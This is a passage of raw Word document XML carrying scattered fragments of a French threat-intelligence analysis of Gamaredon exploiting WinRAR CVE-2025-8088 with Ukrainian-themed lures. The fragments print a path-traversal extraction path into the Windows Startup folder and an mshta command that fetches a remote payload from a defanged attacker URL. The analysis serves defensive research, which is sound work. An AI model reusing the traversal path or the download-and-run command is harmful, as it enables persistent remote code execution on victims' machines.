            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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87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publiée le 8 août 2025.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5757568</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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Cette vulnérabilité peut être exploitée pour permettre l’exécution de code à distance si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5930923</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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fichier est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écrit à des emplacem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ents spécifiques, tels que des chemins de persistance (par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6122893</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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exemple,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Programs\Startup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) ou en remplaçant une DLL afin d’exploiter une vulnérabilité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6319543</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3164278" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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42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détournement de l’ordre de recherche des DLL.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6594498</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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 Google Threat Intelligence Group a publié un rapport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22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concernant ce CVE au cours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6767853</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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l’enquête menée par Sekoia.io. Cette publication a documenté l’exploitation de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6941208</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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vulnérabilité par les groupes d’opérateurs russes Sandworm, Turla, Gamaredon et par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7114563</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2169894" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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98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groupes d’intrusion liés à la Chine.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7387813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5210580" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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058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Visuellement, l'archive semble contenir un seul fichier PDF et un dossier nommé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" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>2276475</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>9104015</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3045982" cy="131433"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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598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4 – Contenu présumé de l’archive .rar avec WinRAR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2728251" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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825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21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https://nvd.nist.gov/vuln/detail/CVE-2025-8088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5247931" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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793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22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https://cloud.google.com/blog/topics/threat-intelligence/exploiting-critical-winrar-vulnerability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82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84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6387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5227964</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="480060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4800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480060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480060"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4800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96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7621914</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="1511299"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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511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511299">
                          <a:moveTo>
                            <a:pt x="0" y="1236344"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1236344"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1511299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1511299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1236344"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="434974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="434974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="434974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435610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="435610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99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5227964</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5875019" cy="480060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4800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480060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480060"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4800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08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7621914</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5760719" cy="1511299"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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511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511299">
                          <a:moveTo>
                            <a:pt x="0" y="1236344"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1236344"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1511299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1511299"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1236344"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="434974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="434974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1236979"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="434974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435610"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="435610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592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5228599</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5874384" cy="479425"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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4794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479425">
                          <a:moveTo>
                            <a:pt x="3174" y="47942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479425"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3174" y="479425"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3174" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="476249"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="476249"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5874384" y="476249"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="476249"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5871210" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5871210" y="47942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1266199</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5311140" cy="215268"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1140" cy="2152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11140" h="215265">
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3310890" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3076575" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="3076575" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5310504" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5310504" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="3075939" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="531114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736" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4660264</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>1480829</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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784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1480829</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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0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1696729</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5311140" cy="431168"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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1140" cy="4311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11140" h="431165">
                          <a:moveTo>
                            <a:pt x="0" y="431165"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="2819400" y="431165"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="635" y="414020"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="214630"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5310504" y="214630"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5310504" y="414020"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="215265"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5311140" y="215265"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4129405" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="4129405" y="0"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5310504" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5310504" y="199390"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4128769" y="635"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="531114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024" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4168774</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>2127259</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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072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2127259</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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2607319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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26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2607319</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5200649" cy="415289"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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649" cy="415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0649" h="415289">
                          <a:moveTo>
                            <a:pt x="635" y="415289"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="635" y="215900"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="5200014" y="215900"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5200014" y="415289"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="216535"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5200649" y="216535"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="4497705" y="199390"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="449770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312" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>5633085</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4179579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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360" behindDoc="1" locked="0" layoutInCell="0" allowOverlap="1" hidden="0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>4534535</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>4179579</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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4395479</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="773430" cy="199389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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43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43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772795" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="772795" y="199389"/>
                          </a:lnTo>
                          <a:moveTo>
                            <a:pt x="0" y="634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77343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552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6339849</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="772163" cy="199390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="3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216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216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772160" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="77216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57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60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3598186" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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81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Cependant, il contient en réalité deux entrées de fichiers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1251173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5598210" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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82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factice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</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="44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43"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Повістка про виклик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1466438</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3410330" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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033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підозрюваного_2_14_6_1033_09.12.2025.pdf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1681703</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5505690" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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569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Un fichier HTA destiné à être extrait via un parcours de chemin :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..\..\..\..\..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1896968</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5410580" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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058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\..\AppData\Roaming\Microsoft\Windows\Start</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle28"/>
                            <w:spacing w:val="277"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D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391"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D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4"/>
                            <w:u w:val="single" w:color="000000"/>
                            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
                          </w:rPr>
                          <w:t xml:space="preserve">Menu\Programs\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744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2112233</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2918840" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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884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Startup\2_14_6_1033_09.12.2025.HTA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2400958</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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Lorsque l’utilisateur extrait manuellement le fichier PDF vers n’importe q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uel emplacement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2592928</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5776645" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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664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2"/>
                          </w:rPr>
                          <w:t xml:space="preserve">son appareil, le fichier HTA est extrait dans le répertoire</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:noProof/>
                            <w:rStyle w:val="fontstyle08"/>
                            <w:spacing w:val="11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C:\Users\[USER]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81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2808193</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\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. Lors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3004843</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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prochaine connexion de l’utilisateur, Windows tentera d’ouvrir les fichiers reconnus situés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3178198</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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dans le dossier "Démarrage" de cet utilisateur (ce comportement est inhérent à Windows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3351553</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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ne s’applique qu’aux fichiers exécutables, par exemple HTA, EXE, BAT, CMD, VBS, PS1,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3524908</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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LNK). Il est intéressant de noter que le SSU a documenté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23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l’utilisation de cette même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3698263</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5716788" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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67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technique (TTP) par Gamaredon dès 2018, en exploitant la vulnérabilité CVE-2018-20250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24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3973218</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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fichier HTA extrait contient un blob VBScript composé à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environ 90 % de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données inutiles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4165188</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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</w:rPr>
                          <w:t xml:space="preserve">et de code obfusqué. Ce code instancie un objet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WScript.Shell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 pour exécuter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00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4380453</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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, en lui transmettant en argument une charge utile hébergée sur un serveur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4577103</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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distant. Il convient de noter que l’argument URL met en œuvre un faux mécanisme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4750458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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d’authentification en ajoutant "www.bbc.com", afin de paraître légitime aux yeux de tout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4923813</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4312333" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2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utilisateur inspectant la requête. La commande finale est la suivante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5218171</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2118919" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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8919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%WINDIR%\system32\mshta.exe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5365491</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5466258" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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6258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hxxps://www.bbc.com@iiwdsxwamylbwwsoyrmj.supabase.co/functions/v1/clever-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5512811</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3829736" cy="147587"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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9736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responder/GurGoogle_09.12.2025/audience/capture.pdf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5950850</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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L'équipe TDR de Sekoia n'a pas réussi à récupérer la charge utile </w:t>
                        </w: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capture.pdf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demandée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6133488</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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par cette co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mmande, car tous les serveurs C2 testés ne répondaient pas. Étant donné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22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6325458</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5817118" cy="162346"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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exécute le contenu de ce fichier, ce mécanisme confère effectivement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6522108</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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l’opérateur des capacités d’exécution de code à distance arbitraires. D’après les TTP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6695463</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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historiques de Gamaredon, cette étape consiste très probablement à télécharger et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6868818</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5836168" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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exécuter GammaLoad. Toutefois, d’un point de vue technique, l’opérateur pourrait déployer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7042173</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5118681" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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86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n’importe quel autre logiciel malveillant issu de son arsenal, tel que GammaWorm.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7592083</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1300585" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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5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Notes de l’analyste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7867038</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4326329" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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63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Identification de nouveaux </w:t>
                        </w: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droppers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HTA associés à Gamaredon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8141993</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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L'analyse a débuté à partir d'un échantillon distribué l’archive mentionnée par Sekoia (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8312415</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="163574"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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2_14_6_1033_09.12.2025.rar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)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. L'objectif était d'identifier d'autres échantillons partageant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8495053</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5835533" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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la même chaîne d'infection, les mêmes conventions de nommage ou des éléments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8668408</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1637637" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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763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d'infrastructure communs.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8943363</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5537502" cy="160641"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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750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premières recherches ont porté sur le nom de l'archive et les fichiers qu'elle dépose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4471961" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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7196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23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https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf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3154971" cy="146037"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="4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497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24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https://www.cve.org/CVERecord?id=CVE-2018-20250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5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58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6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63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65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0006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7307579"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="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73075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7307579">
                          <a:moveTo>
                            <a:pt x="0" y="6859904"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6859904"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="7307579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="7307579"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6859904"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="6587489"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6587489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6860539"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6860539"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6587489"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5966459"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5966459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="6587489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="6587489"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5966459"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="5347970"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5347970"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5966459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5966459"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5347970"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="4380230"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4380230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="5347970"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5347970"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4380230"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3937634"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3937634"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="4380230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="4380230"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3937634"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3482974"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3482974"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3938269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3938269"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3482974"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="3028314"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3028314"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3483609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3483609"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3028314"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2580639"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2580639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="3028949"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="3028949"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2580639"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="2138044"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2138044"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="2580639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2580639"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="2138044"/>
                          </a:lnTo>
                          <a:close/>
                          <a:moveTo>
                            <a:pt x="0" y="1863724"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="5760719" y="1863724"/>
                          </a:lnTo>
                          <a:lnTo>
